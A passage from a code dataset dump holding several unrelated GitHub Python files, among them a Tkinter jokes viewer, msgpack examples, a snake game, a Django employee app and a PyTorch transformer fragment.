zip(*avg_lambda_usage[\"{}\".format(i)])]\n\n\n\ngenLogs(\"remove_fog_first\")\n\n\n\n\n","repo_name":"BrunoDucatiVazquez/Agro5G","sub_path":"5GPy-master/old/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":11470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3726711147","text":"from tkinter import *\nfrom random import randint\nfrom jokes_list import *\n#-------------------[ main window ]----------------------------\nroot = Tk()\nroot.title(\"Jokes view\")\nroot.resizable(0,0)\ncount = 1\nhindi = \"hjoke\"\nenglish = \"ejoke\"\nflag = english\n#---------------------------[ functions ]------------------------------\n\ndef prev():\n global count\n global flag\n if count==1:\n return 0\n else:\n count-=1\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\n\ndef random_():\n global count\n global flag\n count = randint(1,len(listt)//2)\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\ndef next():\n global flag\n global count\n if count==(len(listt)//2):\n return 0\n else:\n count+=1\n labKey[\"text\"] = f\"{flag} No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\ndef switch(choice):\n global flag\n flag = choice\n labKey[\"text\"] = f\"Joke No.{count}\"\n labvalue[\"text\"] = listt[f\"{flag}{count}\"]\n\n#---------------------------[ row -1 ]------------------------------\nlab0 = Label(root,width = 6,height = 2)\nlab0.grid(row = 0,column = 0,sticky = \"ewns\")\n\nlabKey = Label(root)\nlabKey.grid(row = 0,column = 1,sticky = \"ewns\",pady =20)\n\nbtnhindi = Button(root,text = \"HINDI\",command = lambda:switch(hindi))\nbtnhindi.grid(row = 0,column = 3,sticky = \"ewns\",pady =20 )\n\nbtnenglish = Button(root,text = \"ENGLISH\",command = lambda:switch(english))\nbtnenglish.grid(row = 0,column = 5,sticky = \"ewns\",pady =20 )\n\nlab0 = Label(root,width = 6)\nlab0.grid(row = 0,column = 6,sticky = \"ewns\")\n#-----------------------------[ row - 2 ]-----------------------------------\n\nlabvalue = Label(root,bd = 2,relief = \"solid\",width = 35,height = 10,text = listt[\"ejoke1\"],font = \"bold 20\")\nlabvalue.grid(row = 1,column = 1,sticky = \"ewns\",columnspan = 5)\n\n#-----------------------------[ row - 2 ]-----------------------------------\nlab0 = Label(root,height = 1)\nlab0.grid(row = 2,column =0,sticky = \"ewns\")\n\nbtnpre = Button(root,text = \"🢘\",command = prev)\nbtnpre.grid(row = 3,column = 1,sticky = \"ewns\")\nbtnrand = Button(root,text = \"RANDOM\",font = \"bold\",command = random_)\nbtnrand.grid(row = 3,column = 3,sticky = \"ewns\")\nbtnnext = Button(root,text = \"🢚\",command = next)\nbtnnext.grid(row = 3,column = 5,sticky = \"ewns\")\n\nlab0 = Label(root,height = 1)\nlab0.grid(row = 4,column =0,sticky = \"ewns\")\n\n\n#---------------------------------------------------------------------\nlabKey[\"text\"] = \"Joke No.1\"\n#-----------------------------[ event loop ]----------------------------------\n\nroot.mainloop()","repo_name":"aadilmughal786/jokes-view-Tkinter","sub_path":"Jokesview.py","file_name":"Jokesview.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14425986996","text":"#!usr/bin/python3\n\"\"\"\nBasic msgpack reading into array or dictionary\n\nSome notes:\n\nWriting msgpack files with c++ or python and reading back in python\nyeilds the same results.\n\nStrings written to file will be read with \"b'\" bytes literal, that need to be converted\nto appropriate output.\n\nNumbers are loaded correctly and do not need to be converted from bytes literal.\n\nOne aspect to note, image data is generally recorded as a string/char array, and will therefore\nbe written as a byte literal; however converting to string may result in problems when using\nthe python built-in UTF-8 decoder due to random character escape keys.\n\"\"\"\n\nimport msgpack\nimport numpy as np\n\n# open msgpack file:\nfileName = \"/home/en/git/private/msgpack-examples/cmake-build-debug/test01.mpk.active\"\nf = open(fileName, \"rb\")\n# use max_bin_length=val or max_array_length=val to circumvent internal\n# create unpacker object:\npk = msgpack.Unpacker(f)\n# unpacker is a generator, can call next() on it:\nnext_msg = next(pk)\n# parse each message into data array:\nmsgs = [i for i in pk]\n# close the file\nf.close()\n# process data here...\n\n\n\n# Alternative using with operator\nwith open(fileName, \"rb\") as file:\n pk = msgpack.Unpacker(file)\n msgs = [i for i in pk]\n\n\n# Alternative using with operator\nwith open(fileName, \"rb\") as file:\n pk = msgpack.Unpacker(file)\n for _item in pk:\n # do work on _item\n pass\n\n# Pack some data\n# packing a key-value pair adds 10 Bytes per char\ndata = {}\nfor k in range(10):\n data[\"keasdfadsfa{:d}\".format(k)] = np.random.rand()\n\nkeys = [k for k in data]\ndatar = [data[k] for k in data]\n\n_p = str(msgpack.packb(data))\n\n# Write msgpack file\nwith open('data.msgpack', 'wb') as outfile:\n msgpack.pack(data, outfile)\n msgpack.pack(data, outfile)\n msgpack.pack(data, outfile)\n\nwith open('datar.msgpack', 'wb') as outfile:\n msgpack.pack(keys, outfile)\n msgpack.pack(datar, outfile)\n msgpack.pack(datar, outfile)\n\n# Read msgpack file\nwith open(fileName, 'rb') as data_file:\n unpacker = msgpack.Unpacker(data_file)\n data_loaded = []\n for m in unpacker:\n data_loaded.append(m)\n","repo_name":"evgenyslab/msgpack-examples","sub_path":"python/basic_reader.py","file_name":"basic_reader.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71996204004","text":"# -*- coding: utf-8 -*-\n# csv2json.py\n# 2023-06-01 K.OHWADA\n\nimport csv\nimport json\n\n\nFILE_CSV= 'japan_designated_city_list.csv'\n\nFILE_JSON= 'japan_designated_city_coordinates_list.json'\n\n\nCOMMA = ','\n\nCOMMA_HTML = ','\n\nHYPHEN = '-'\n\nEMPTY = ''\n\nSEMICOLON = ';'\n\nCOLON_COLON = '::'\n\n\ndef restore_comma(data):\n if not data:\n return EMPTY\n str_data = data.strip()\n ret = str_data.replace(COMMA_HTML, COMMA)\n return ret\n#\n\n\ndef restore_hyphen(data):\n if not data:\n return EMPTY\n str_data = data.strip()\n if str_data == HYPHEN:\n return EMPTY\n return str_data\n#\n\n\nd= {}\n\nd['name_en'] = '英語名'\nd['name_city'] = '市名'\nd['name_pref'] = '\t都道府県'\nd['url_flag'] = '市旗'\nd['lat'] = '緯度'\nd['lon'] = '経度'\n\ndic = {}\n\ndic['title'] = 'List of Japan ordinance_designated_city'\n\ndic['title_ja'] = '政令指定都市の一覧 位置情報付き'\n\ndic['reference'] = 'wikipedia : 政令指定都市'\n\ndic['url_reference'] = 'https://ja.wikipedia.org/wiki/%E6%94%BF%E4%BB%A4%E6%8C%87%E5%AE%9A%E9%83%BD%E5%B8%82'\n\ndic['item_name_ja'] = d\n\n\ncities = []\n\n\nwith open(FILE_CSV, 'r') as f2:\n reader2 = csv.reader(f2)\n\n for row in reader2:\n len_row = len(row)\n print('len: ', len_row)\n if len_row < 10:\n continue\n d= {}\n d['name_city'] = row[0].strip()\n d['url_city'] = row[1].strip()\n d['name_pref'] = row[2].strip()\n d['url_pref'] = row[3].strip()\n d['url_flag'] = row[4].strip()\n d['flag_width'] = int( row[5].strip() )\n d['flag_height'] = int( row[6].strip() )\n d['name_en'] = row[7].strip()\n d['lat'] = float( row[8].strip() )\n d['lon'] = float( row[9].strip() )\n print(d)\n cities.append(d)\n#\n\ndic['cities'] = cities\n\nwith open(FILE_JSON, 'wt', encoding='utf-8') as f2:\n json.dump(dic, f2, ensure_ascii=False)\n#\n","repo_name":"ohwada/World_Countries","sub_path":"japan_municipaliy/japan_designated_city_list_coordinates/python/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30639534378","text":"# -----------------------------------------------.\n# 物理空間内の形状情報を変更.\n# f_rigidBodyType ... 剛体の種類.\n# f_softBody ... ソフトボディ時は1.\n# f_collisionType ... 衝突形状の種類.\n# f_margin ... マージン.\n# f_softBodyVolume ... ソフトボディの体積保持時は1.\n# f_softBodyKLST ... ソフトボディの硬さ.\n# f_softBodyKVC ... ソフトボディの体積を保つ.\n# f_selectIndex ... 選択された形状番号(リストボックスのインデックス)がコンマ区切りで入る.\n# return 追加された形状番号をコンマ区切りの文字列で返す.\n#\n# 要 : getCurrentPhysics.py / updateTempShapes.py\n# -----------------------------------------------.\nresult = ''\n\n# 値を数値またはtrue/falseに変換.\nerrF = False\ntry:\n f_rigidBodyType = int(f_rigidBodyType)\n f_collisionType = int(f_collisionType)\n f_margin = float(f_margin)\n f_softBodyKLST = float(f_softBodyKLST)\n f_softBodyKVC = float(f_softBodyKVC)\n if f_softBody == '1': f_softBody = True\n else: f_softBody = False\n if f_softBodyVolume == '1': f_softBodyVolume = True\n else: f_softBodyVolume = False\n\n selectIndexList = f_selectIndex.split(\",\")\n f_selectIndex = []\n for i in range(len(selectIndexList)):\n f_selectIndex.append(int(selectIndexList[i]))\n \nexcept:\n f_rigidBodyType = 0\n f_collisionType = 1\n f_softBody = False\n f_margin = 0.0\n f_softBodyKLST = 0.2\n f_softBodyKVC = 0.0\n f_softBodyVolume = False\n f_selectIndex = []\n errF = True\n\nscene = xshade.scene()\n\n# --------------------------------------------------.\n# 0番目の物理シーンの情報を更新.\n# --------------------------------------------------.\ndef updateShapes():\n global result\n\n # 追加/変更する物理形状が 剛体 <==> ソフトボディとなる場合は、.\n # physics.append_softbody_shape/physics.append_rigidbody_shapeではパラメータを変更できない.\n # そのため、一度物理シーン内の形状情報を取得してから物理シーンをクリア、そのあと再追加している.\n \n # 物理シーンの形状情報を保持.\n phyShapeList = getPhysicsShapesParam()\n if phyShapeList == None: return\n\n # 0番目の物理シーンを作成 (要 : getCurrentPhysics.py).\n phy = getCurrentPhysics()\n if phy == None: return\n \n phyShapesCou = phy.number_of_shapes\n\n # 作業用のパラメータを更新.\n mass = 1.0\n for i in range(phyShapesCou):\n if i in f_selectIndex:\n if i >= len(phyShapeList): continue\n phyShape = phy.get_shape(i)\n if f_softBody and phyShape.shape.type != 7: # ソフトボディ時にポリゴンメッシュでない場合は変更しない.\n continue\n phyData = []\n try:\n phyData.append(f_softBody)\n phyData.append(f_margin)\n phyData.append(mass)\n phyData.append(phyShape.name)\n phyData.append(phyShape.shape)\n phyData.append(phyShape.trigger_stop)\n if f_softBody:\n phyData.append(0.0)\n phyData.append(0.0)\n phyData.append(f_softBodyKLST)\n phyData.append(f_softBodyKVC)\n phyData.append(f_softBodyVolume)\n else:\n phyData.append(f_collisionType)\n phyData.append(f_rigidBodyType)\n phyShapeList[i] = phyData\n except:\n pass\n\n # 物理シーンの形状情報を更新.\n updatePhysicsShapes(phyShapeList)\n\n result = ''\n for i in range(phyShapesCou):\n if i in f_selectIndex:\n phyShape = phy.get_shape(i)\n\n # 追加された物理形状のインデックスをresultに追加.\n if phyShape != None:\n if i >= 0:\n if result != '':\n result += ','\n result += str(i)\n \n phyShape = None # 念のための解放処理. \n \n # 物理シーンを更新.\n phy.update()\n return\n \nif errF == False:\n updateShapes()\n","repo_name":"shade3d/physics_assistant","sub_path":"py/updateShapes.py","file_name":"updateShapes.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1799221331","text":"class MulLayer:\n def __init__(self):\n self.x = None\n self.y = None\n \n def forward(self, x, y):\n self.x = x\n self.y = y\n out = x * y\n return out\n \n def backward(self, dout):\n dx = dout * self.y #역전파에서 곱셈 노드는 x,y 값을 바꾼다.\n dy = dout * self.x\n return dx, dy\n\napple = 100\napple_num = 2\ntax = 1.1\n\n# 계층들\nmul_apple_layer = MulLayer()\nmul_tax_layer = MulLayer()\n\n# 순전파\napple_price = mul_apple_layer.forward(apple, apple_num)\nprice = mul_tax_layer.forward(apple_price, tax)\n\nprint(price) # 순전파 결과 값 : 소비세(1.1) 적용된 사과 가격\n\n# 역전파\ndprice = 1\ndapple_price, dtax = mul_tax_layer.backward(dprice)\ndapple, dapple_num = mul_apple_layer.backward(dapple_price)\n\nprint(dapple, dapple_num, dtax) # 역전파 결과 값 : 소비세가 아주 약간 오르면 가격은 얼마나 오르나?","repo_name":"NewPlus/deepLearning_from_scratch_1_practice","sub_path":"밑바닥부터 시작하는 딥러닝 예제/cp04/cp04-01(곱셈 계층).py","file_name":"cp04-01(곱셈 계층).py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73627316644","text":"from elements.yolo import CAR_DETECTION, PLATE_DETECTION, CHAR_EXTRACTION\nimport numpy as np\nimport cv2\nimport os\nfrom glob import glob\nfrom time import time\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--image', type = str, default = 'test_images/test1.jpg' , help = 'Name of the input image.')\nargs = parser.parse_args()\n\nframe = cv2.imread(args.image)\n\ncar_classes = {2: 'car', 5: 'bus', 7: 'truck'}\nplate_classes = {0: 'plate'}\nchar_classes = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9',\n 10: 'a', 11: 'b', 12: 'p', 13: 't', 14: 'c', 15: 'j', 16: 'ch', 17: 'h', 18: 'kh', 19: 'd', 20: 'zal', 21: 'r', 22: 'z', 23: 'zh',\n 24: 's', 25: 'sh', 26: 'sad', 27: 'zad', 28: 'ta', 29: 'za', 30: 'ain', 31: 'q', 32: 'f', 33: 'qaf', 34: 'k', 35: 'g', 36: 'l', 37: 'm',\n 38: 'n', 39: 'v', 40: 'he', 41: 'y', 42: 'malool'}\n\n# detector objects\ncar_detector = CAR_DETECTION('weights/car_model.pt', car_classes)\nplate_detector = PLATE_DETECTION('weights/plate_model.pt', plate_classes)\nchar_extractor = CHAR_EXTRACTION('weights/char_model.pt', char_classes)\n\n# detection process\ncars = car_detector.detect(frame)\nplates = plate_detector.detect(frame, cars)\nchars = char_extractor.detect(frame, plates)\n\n# plotting\nfor car in cars:\n print(car)\n label = car['label']\n score = car['score']\n [(xmin,ymin),(xmax,ymax)] = car['bbox']\n frame = cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), [0,255,255] , 2) \n frame = cv2.putText(frame, f'{label} ({str(score)})', (xmin,ymin), cv2.FONT_HERSHEY_SIMPLEX , 0.75, [0,255,255], 2, cv2.LINE_AA)\n\n if car['plate_bbox'] is not None:\n [(xmin,ymin),(xmax,ymax)] = car['plate_bbox']\n frame = cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), [255,0,0] , 2) \n frame = cv2.putText(frame, 'plate', (xmin,ymin), cv2.FONT_HERSHEY_SIMPLEX , 0.75, [255,0,0], 2, cv2.LINE_AA)\n\n\ncv2.imshow('output', cv2.resize(frame,(1000,700)))\ncv2.waitKey()","repo_name":"NEFTeam/Traffic-Law-Enforcement","sub_path":"PlateDetection/main_plate.py","file_name":"main_plate.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"17307789382","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import abspath, realpath, split, dirname\nimport collections\nfrom datetime import datetime, timedelta\nimport time\n\nimport jinja2\nimport json\nimport logging\nimport pytz\nimport shutil\nimport sys\nimport logging\n\nfrom jinja2.exceptions import UndefinedError\nfrom .core import args\nfrom .extras import parseFeedURL, fetch_content, templateContent, process_entry\nfrom .styles import cssTextDecoded\n\nfrom .__main__ import logFile\n\n#argsFilename = args.filename\nstandardPath = os.getcwd()\n\n# Get a list of feed URLs\ntry:\n with open('feeds.txt') as f:\n SUBSCRIPTIONS = list(f)\n print('Loading feeds.txt')\nexcept FileNotFoundError: # If you don't have 'feeds.txt' in specified path, you can specify one (nfsyndication-src --filename=sample.txt)\n try:\n for documentList in args.filename:\n parent_location = os.getcwd()\n with open(documentList) as f:\n SUBSCRIPTIONS = list(f)\n print(\"Loading file: {} from '{}'\".format(documentList, os.path.join(parent_location)))\n except TypeError:\n raise Exception('NFSyndication [ERROR]: feeds.txt not found. See `nfsyndication-src --help` for more.')\n\nposts = []\noutJSONFeed= []\n\ntry:\n for url in SUBSCRIPTIONS:\n try:\n feed = parseFeedURL(url)\n blog = feed['feed']['title']\n except KeyError:\n if args.verbose and feed.bozo:\n logging.error(\"Feed data summary on URL {}\".format(url))\n logging.error(\"Failed command: {} \".format(sys.argv[0:]))\n logging.error(\"Exception [{bozo_exception}]: {bozo_message}\".format(bozo_exception=str(feed.bozo_exception.__class__.__name__), bozo_message=str(feed.bozo_exception)))\n logging.error('Response code is: {}'.format(feed.status))\n if (hasattr(feed.bozo_exception, 'getLineNumber') and hasattr(feed.bozo_exception, 'getMessage')):\n line = feed.bozo_exception.getLineNumber()\n logging.error('Line %d: %s', line, feed.bozo_exception.getMessage())\n logging.error('[NFSyndication] Writing output logs to {}'.format(os.path.join(standardPath, logFile))) \n raise Exception(f\"[{feed.bozo_exception}] (code {feed.status}) \\n{(f'Could not fetch URL(s): {url}')}\")\n sys.exit(-1)\n continue\n for entry in feed['entries']:\n post = process_entry(entry, blog, comp_field=args.comparator_filter)\n if post:\n posts.append(post)\n outJSONFeed.append(feed)\n try:\n fetch_content(url)\n except:\n raise SystemExit\nexcept NameError:\n pass\n\nif args.outputJSON:\n with open(args.outputJSON, 'w+', encoding='utf8') as outf:\n json.dump(outJSONFeed, outf, ensure_ascii=False, indent=4)\n \n \n# Get the template, and drop in the posts\ndir_path = os.path.split(os.path.realpath(__file__))[0]\n\ntry:\n with open(f'{dir_path}/templates/template.html', encoding='utf8') as f:\n print(\"\\nChecking original template file...\")\n template = jinja2.Template(f.read())\n with open(f'output/index.html', 'w', encoding='utf8') as f:\n f.write(template.render(posts=posts, time=datetime.now()))\n print('Successful.') \n with open(\"output/style.css\", 'w') as f:\n f.write(cssTextDecoded)\n\nexcept FileNotFoundError:\n template = jinja2.Template(templateContent)\n# When done, it converts to HTML\n with open(f'output/index.html', 'w', encoding='utf8') as f:\n f.write(template.render(cssText=cssTextDecoded, posts=posts, time=datetime.now()))\n print('Successful.')\n","repo_name":"web-sys1/NFSyndication","sub_path":"NFSyndication/nfs_main.py","file_name":"nfs_main.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9146404697","text":"import os\nfrom setuptools import setup, find_packages\nimport sys\n\ntry:\n import numpy\nexcept ImportError:\n raise ImportError(\n \"Please install NumPy first, or use the Anaconda Python Distribution \"\n \"(https://store.continuum.io/cshop/anaconda/) which comes with NumPy \"\n \"installed.\"\n )\n\n\n\nversion_py = os.path.join(os.path.dirname(__file__), 'metaseq', 'version.py')\nversion = open(version_py).read().split('=')[-1].strip().replace('\"','')\n\nrequirements = open(os.path.join(os.path.dirname(__file__), 'requirements.txt')).readlines()\n\n\nlong_description = open('README.rst').read()\nsetup(\n name='metaseq',\n version=version,\n description=\"Integrative analysis of high-thoughput sequencing data\",\n #long_description=long_description,\n license=\"MIT\",\n install_requires=requirements,\n packages=find_packages(),\n package_data={\n 'metaseq':[\n 'test/data/gdc*',\n 'test/data/make_examples_from_pybedtools.py',\n 'test/data/x.*',\n ]\n },\n scripts=[\n 'metaseq/scripts/download_metaseq_example_data.py',\n 'metaseq/scripts/metaseq-cli',\n 'metaseq/scripts/speedtest.py',\n ],\n author='Ryan Dale',\n author_email='dalerr@niddk.nih.gov',\n url='http://github.com/daler/metaseq',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Operating System :: POSIX',\n 'Operating System :: MacOS :: MacOS X',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'Topic :: Scientific/Engineering :: Medical Science Apps.', \n ]\n )\n","repo_name":"daler/metaseq","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"52"} +{"seq_id":"72429581924","text":"import pygame\nimport time\nimport random\nimport sys\n\npygame.init()\n\n# Cargar el sonido de la manzana\neat_sound = pygame.mixer.Sound(\"hackaton23/snake_game/1.mp3\")\nmagic_potion_sound = pygame.mixer.Sound(\"hackaton23/snake_game/2.mp3\")\n\n\n# Definir colores\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\nred = (213, 50, 80)\nblue = (50, 153, 213)\ngreen = (0, 255, 0)\n\n# Definir el tamaño de la pantalla\ndis_width = 600\ndis_height = 400\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by ProGit')\n\n# Definir la velocidad del juego\nsnake_block = 10\nsnake_speed = 8\n\n# Definir la fuente y el tamaño del texto\nfont_style = pygame.font.SysFont(None, 25)\n\n# Función para dibujar la serpiente en la pantalla\ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, white, [x[0], x[1], snake_block, snake_block])\n\n# Función para mostrar el puntaje en la pantalla\ndef Your_score(score):\n value = font_style.render(\"Tus punticos: \" + str(score), True, blue)\n dis.blit(value, [0, 0])\n\n# Función para mostrar el mensaje de derrota\ndef message(msg, color):\n mesg = font_style.render(msg, True, color)\n dis.blit(mesg, [dis_width / 6, dis_height / 3])\n\n# Función principal del juego\ndef gameLoop():\n game_over = False\n game_close = False\n\n # Inicializar la posición de la serpiente\n x1 = dis_width / 2\n y1 = dis_height / 2\n\n # Inicializar el cambio en la posición de la serpiente\n x1_change = 0\n y1_change = 0\n\n # Inicializar la longitud de la serpiente\n snake_List = []\n Length_of_snake = 1\n\n # Inicializar la posición de la comida\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n potionx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n potiony = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n\n while not game_over:\n\n while game_close:\n dis.fill(black)\n message(\"¡Perdiste! Presiona C para jugar otra vez o Q para salir\", red)\n Your_score(Length_of_snake - 1)\n pygame.display.update()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n game_over = True\n game_close = False\n if event.key == pygame.K_c:\n gameLoop()\n elif event.type == pygame.QUIT:\n game_over = True\n game_close = False\n pygame.quit()\n sys.exit()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT and x1_change == 0:\n x1_change = -snake_block\n y1_change = 0\n elif event.key == pygame.K_RIGHT and x1_change == 0:\n x1_change = snake_block\n y1_change = 0\n elif event.key == pygame.K_UP and y1_change == 0:\n y1_change = -snake_block\n x1_change = 0\n elif event.key == pygame.K_DOWN and y1_change == 0:\n y1_change = snake_block\n x1_change = 0\n elif event.key == pygame.K_ESCAPE:\n game_close = True\n\n # Actualizar la posición de la serpiente\n x1 += x1_change\n y1 += y1_change\n\n # Verificar si la serpiente choca con ella misma\n for segment in snake_List[:-1]:\n if segment == [x1, y1]:\n game_close = True\n\n # Verificar si la serpiente sale de la pantalla\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n game_close = True\n\n dis.fill(black)\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n pygame.draw.rect(dis, green, [potionx, potiony, snake_block, snake_block]) # Dibuja la poción mágica\n\n\n\n snake_head = [x1, y1]\n snake_List.append(snake_head)\n\n # Limitar la longitud de la serpiente\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 1)\n\n pygame.display.update()\n\n # Generar una nueva posición para la comida cuando la serpiente la come\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n\n # Reproducir el sonido de la manzana\n eat_sound.play()\n\n if x1 == potionx and y1 == potiony:\n potionx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n potiony = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake -= 1 # Restar 1 a la longitud de la serpiente\n\n magic_potion_sound.play()\n\n\n # Ajustar la velocidad de la serpiente en función de su longitud\n snake_speed = 8 + Length_of_snake * 1.2\n\n pygame.time.Clock().tick(snake_speed)\n\n pygame.quit()\n sys.exit()\n\ngameLoop()","repo_name":"Marcos20292004/snake_game","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72457312166","text":"from os import error\nfrom django.http import request\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import EmployeeCreation\nfrom django.contrib import messages\nfrom .models import Employee, Supervisor, Log\nimport openpyxl\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nimport pandas as pd\nfrom task.tasks import upload_task\nfrom task.tasks import message_\n\n\n@login_required\ndef home(request):\n employees = reversed(Employee.objects.all())\n context = {\"employees\": employees}\n return render(request, \"base/index.html\", context)\n\n\n@login_required\ndef log(request):\n logs = reversed(Log.objects.all())\n context = {\"logs\": logs}\n return render(request, \"base/logs.html\", context)\n\n\ndef user_login(request):\n if request.method == \"POST\":\n username = request.POST.get(\"username\", \"\")\n password = request.POST.get(\"password\", \"\")\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user=user)\n return redirect(\"home\")\n else:\n return render(request, \"base/login.html\")\n return render(request, \"base/login.html\")\n\n\n@login_required\ndef employee_creation(request):\n if request.method == \"POST\":\n form = EmployeeCreation(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"Employee added successfully\")\n return redirect(\"home\")\n else:\n messages.error(request, \"Please check input\")\n form = EmployeeCreation()\n return render(request, \"base/create_employee.html\", {\"form\": form})\n else:\n form = EmployeeCreation()\n return render(request, \"base/create_employee.html\", {\"form\": form})\n\n\n@login_required\ndef upload_data(request):\n if request.method == \"POST\":\n try:\n file_ = request.FILES[\"file\"]\n except Exception as e:\n file_ = \"\"\n filename = str(file_)\n ext = filename.split(\".\")[-1]\n\n print(ext)\n if ext == \"xlsx\":\n upload_task(file_)\n return redirect(\"home\")\n elif ext == \"\":\n messages.error(request, \"Please choose a file\")\n else:\n messages.error(\n request, \"Please upload an Excel file with '.xlsx' extension\"\n )\n return redirect(\"upload_data\")\n return render(request, \"base/upload.html\")\n","repo_name":"fennin3/employee-data-collection-app","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2226721511","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n# Hyperparameter\nvocab_size = 10000\nd_model = 512\nn_heads = 8\ndim_feedforward = 2048\nnum_layers = 6\nnum_epochs = 10\nlearning_rate = 0.001\n\n# Token Embedding\nclass TokenEmbedding(nn.Module):\n def __init__(self, vocab_size, d_model):\n super(TokenEmbedding, self).__init__()\n self.embedding = nn.Embedding(vocab_size, d_model)\n self.d_model = d_model\n\n def forward(self, x):\n return self.embedding(x) * torch.sqrt(torch.tensor(self.d_model, dtype=torch.float32))\n\n# Positional Encoding\nclass PositionalEncoding(nn.Module):\n def __init__(self, d_model):\n super(PositionalEncoding, self).__init__()\n self.d_model = d_model\n self.dropout = nn.Dropout(0.1)\n pe = torch.zeros(1000, d_model)\n position = torch.arange(0, 1000, dtype=torch.float32).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + self.pe[:x.size(0), :]\n return self.dropout(x)\n\n# Self-Attention Layer\nclass SelfAttention(nn.Module):\n def __init__(self, d_model, n_heads):\n super(SelfAttention, self).__init__()\n self.d_model = d_model\n self.n_heads = n_heads\n self.head_dim = d_model // n_heads\n self.q_linear = nn.Linear(d_model, d_model)\n self.k_linear = nn.Linear(d_model, d_model)\n self.v_linear = nn.Linear(d_model, d_model)\n self.out_linear = nn.Linear(d_model, d_model)\n\n def forward(self, x):\n q = self.q_linear(x)\n k = self.k_linear(x)\n v = self.v_linear(x)\n q = self.split_heads(q)\n k = self.split_heads(k)\n v = self.split_heads(v)\n scaled_attention, attention_weights = self.scaled_dot_product_attention(q, k, v)\n scaled_attention = self.combine_heads(scaled_attention)\n output = self.out_linear(scaled_attention)\n return output\n\n def split_heads(self, x):\n batch_size, seq_length, _ = x.size()\n x = x.view(batch_size, seq_length, self.n_heads, self.head_dim)\n return x.permute(0, 2, 1, 3)\n\n def scaled_dot_product_attention(self, q, k, v):\n matmul_qk = torch.matmul(q, k.permute(0, 1, 3, 2))\n scaled_attention_logits = matmul_qk / torch.sqrt(torch.tensor(self.head_dim, dtype=torch.float32))\n attention_weights = nn.Softmax(dim=-1)(scaled_attention_logits)\n output = torch.matmul(attention_weights, v)\n return output, attention_weights\n\n def combine_heads(self, x):\n batch_size, _, seq_length, _ = x.size()\n x = 